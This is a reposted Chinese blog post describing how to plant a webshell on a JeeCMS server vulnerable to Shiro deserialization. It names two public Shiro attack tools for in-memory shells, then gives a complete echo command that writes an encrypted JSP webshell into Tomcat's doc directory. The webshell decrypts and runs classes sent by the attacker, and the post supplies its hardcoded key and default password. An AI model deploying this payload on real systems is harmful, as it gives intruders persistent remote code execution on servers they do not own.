jeecms寫shell的兩種方法

本文轉載自查看原文 2020-12-07 22:24 452 安全

起因

某日同事說遇到一個存在shiro反序列化的站點。
此站點為jeecms，此站點不出網。
首先jeecms的web目錄是不解析你上傳的jsp、jspx文件的應該是在web.xml文件中做了限制。

內存shell

首先想到的是寫內存shell，因為之前遇到的這種情況就是這么搞的。
寫內存shell的話有下面兩款開源工具。
https://github.com/j1anFen/shiro_attack
此工具即可上馬也可以上regeorg正好滿足我們的需求
https://github.com/fupinglee/ShiroScan
這款好像沒有上內存regeorg的功能
但是使用這兩款工具上內存shell都沒有成功。

tomcat默認目錄

此站點為windows，shiro執行命令默認在tomcat的bin目錄。
首先dir確定tomcat目錄，訪問tomcat wepapps發現存在tomcat默認自帶的doc目錄。
使用echo往此目錄中寫入webshell

echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^>^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^>^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*該密鑰為連接密碼32位md5值的前16位，默認連接密碼rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> > D:\xxx\webapps\doc\ssss.jsp

shell路徑為www.xxx.com/doc/ssss.jsp
如果沒有doc目錄的話可以再webapps目錄下新建文件夾上傳shell。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 映射的兩種方法 Java執行shell腳本並返回結果兩種方法的完整代碼 python乘方運算的兩種方法 ajax獲取值的兩種方法 php數字補零的兩種方法 MongoDB實現分頁（兩種方法） spring整合mybatis的兩種方法 nodejs升級的兩種方法禁用ipv6的兩種方法 Hive實現自增列的兩種方法